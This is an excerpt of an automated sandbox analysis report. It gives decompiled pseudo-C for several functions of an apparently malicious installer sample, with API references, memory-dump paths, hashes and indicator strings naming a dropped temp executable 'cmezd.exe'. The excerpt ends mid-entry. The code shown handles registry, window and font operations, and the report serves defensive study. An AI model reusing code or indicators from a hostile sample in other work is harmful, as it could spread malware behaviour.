                                                                                              • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 48%
                                                                                              			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                              0x00402eb4
                                                                                              0x00402ebd
                                                                                              0x00402ec6
                                                                                              0x00402ed2
                                                                                              0x00402edb
                                                                                              0x00402ee5
                                                                                              0x00402f0a
                                                                                              0x00402f10
                                                                                              0x00402f15
                                                                                              0x00402f16
                                                                                              0x00402f46
                                                                                              0x00402f1f
                                                                                              0x00402f21
                                                                                              0x00402f71
                                                                                              0x00402f74
                                                                                              0x00000000
                                                                                              0x00402f7a
                                                                                              0x00402f30
                                                                                              0x00402f35
                                                                                              0x00402f37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402f3f
                                                                                              0x00402f44
                                                                                              0x00402f45
                                                                                              0x00402f45
                                                                                              0x00402f52
                                                                                              0x00402f5a
                                                                                              0x00402f61
                                                                                              0x00000000
                                                                                              0x00402f8a
                                                                                              0x00000000
                                                                                              0x00402f69
                                                                                              0x00402ef5
                                                                                              0x00402f08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402f08
                                                                                              0x00402f90

                                                                                              APIs
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                              • String ID:
                                                                                              • API String ID: 1354259210-0
                                                                                              • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                              • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                              • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                              • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                              0x00401d81
                                                                                              0x00401d85
                                                                                              0x00401d9a
                                                                                              0x00401d87
                                                                                              0x00401d89
                                                                                              0x00401d8f
                                                                                              0x00401d8f
                                                                                              0x00401da0
                                                                                              0x00401da3
                                                                                              0x00401dad
                                                                                              0x00401db0
                                                                                              0x00401db8
                                                                                              0x00401dc9
                                                                                              0x00401dcc
                                                                                              0x00401dd7
                                                                                              0x00401dce
                                                                                              0x00401dd0
                                                                                              0x00401dd0
                                                                                              0x00401ddb
                                                                                              0x00401de5
                                                                                              0x00401e0c
                                                                                              0x00401e1b
                                                                                              0x00401e29
                                                                                              0x00401e31
                                                                                              0x00401e39
                                                                                              0x00401e39
                                                                                              0x00401e42
                                                                                              0x00401e48
                                                                                              0x00402ba4
                                                                                              0x00402ba4
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                              • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                              • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                              • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 73%
                                                                                              			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                              0x00401e4e
                                                                                              0x00401e59
                                                                                              0x00401e5b
                                                                                              0x00401e68
                                                                                              0x00401e7f
                                                                                              0x00401e84
                                                                                              0x00401e91
                                                                                              0x00401e96
                                                                                              0x00401e9a
                                                                                              0x00401ea5
                                                                                              0x00401eac
                                                                                              0x00401ebe
                                                                                              0x00401ec4
                                                                                              0x00401ec9
                                                                                              0x00401ed3
                                                                                              0x00402638
                                                                                              0x0040156d
                                                                                              0x00402ba4
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401E51
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                              • ReleaseDC.USER32 ref: 00401E84
                                                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2584051700-0
                                                                                              • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                              • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                              • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                              • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 59%
                                                                                              			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                              0x00401c43
                                                                                              0x00401c45
                                                                                              0x00401c4c
                                                                                              0x00401c4f
                                                                                              0x00401c52
                                                                                              0x00401c5c
                                                                                              0x00401c60
                                                                                              0x00401c63
                                                                                              0x00401c6c
                                                                                              0x00401c6c
                                                                                              0x00401c6f
                                                                                              0x00401c73
                                                                                              0x00401c7c
                                                                                              0x00401c7c
                                                                                              0x00401c7f
                                                                                              0x00401c83
                                                                                              0x00401c85
                                                                                              0x00401cda
                                                                                              0x00401cdc
                                                                                              0x00401ce7
                                                                                              0x00401cf1
                                                                                              0x00401cf4
                                                                                              0x00401cf4
                                                                                              0x00401cfd
                                                                                              0x00000000
                                                                                              0x00401c87
                                                                                              0x00401c8e
                                                                                              0x00401c90
                                                                                              0x00401c93
                                                                                              0x00401c99
                                                                                              0x00401ca0
                                                                                              0x00401ca3
                                                                                              0x00401ccb
                                                                                              0x00401d03
                                                                                              0x00401d03
                                                                                              0x00401ca5
                                                                                              0x00401cb3
                                                                                              0x00401cbb
                                                                                              0x00401cbe
                                                                                              0x00401cbe
                                                                                              0x00401ca3
                                                                                              0x00401d06
                                                                                              0x00401d09
                                                                                              0x00401d0f
                                                                                              0x00402ba4
                                                                                              0x00402ba4
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                              • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                              • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                              • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                              0x00406544
                                                                                              0x00406546
                                                                                              0x0040655b
                                                                                              0x0040655e
                                                                                              0x00406563
                                                                                              0x00406568
                                                                                              0x004065a6
                                                                                              0x004065a6
                                                                                              0x0040656a
                                                                                              0x0040657c
                                                                                              0x00406587
                                                                                              0x0040658d
                                                                                              0x00406598
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406598
                                                                                              0x004065ac

                                                                                              APIs
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,?,?,0040679D,80000002), ref: 0040657C
                                                                                              • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00000000,00422728), ref: 00406587
                                                                                              Strings
                                                                                              • "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p, xrefs: 0040653D
                                                                                              • ('B, xrefs: 0040655B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p$('B
                                                                                              • API String ID: 3356406503-2102281024
                                                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                              • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                              • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                              0x00405f38
                                                                                              0x00405f45
                                                                                              0x00405f46
                                                                                              0x00405f51
                                                                                              0x00405f59
                                                                                              0x00405f59
                                                                                              0x00405f61

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-3916508600
                                                                                              • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                              • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                              • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                              • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 89%
                                                                                              			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                                                              0x00405642
                                                                                              0x0040564c
                                                                                              0x00405668
                                                                                              0x0040568a
                                                                                              0x0040568d
                                                                                              0x00405693
                                                                                              0x0040569d
                                                                                              0x0040569e
                                                                                              0x004056a0
                                                                                              0x004056a6
                                                                                              0x004056a6
                                                                                              0x004056b0
                                                                                              0x00000000
                                                                                              0x004056be
                                                                                              0x00405675
                                                                                              0x004056ad
                                                                                              0x004056ad
                                                                                              0x00000000
                                                                                              0x004056ad
                                                                                              0x00405681
                                                                                              0x00405683
                                                                                              0x00000000
                                                                                              0x00405683
                                                                                              0x00405652
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405659
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
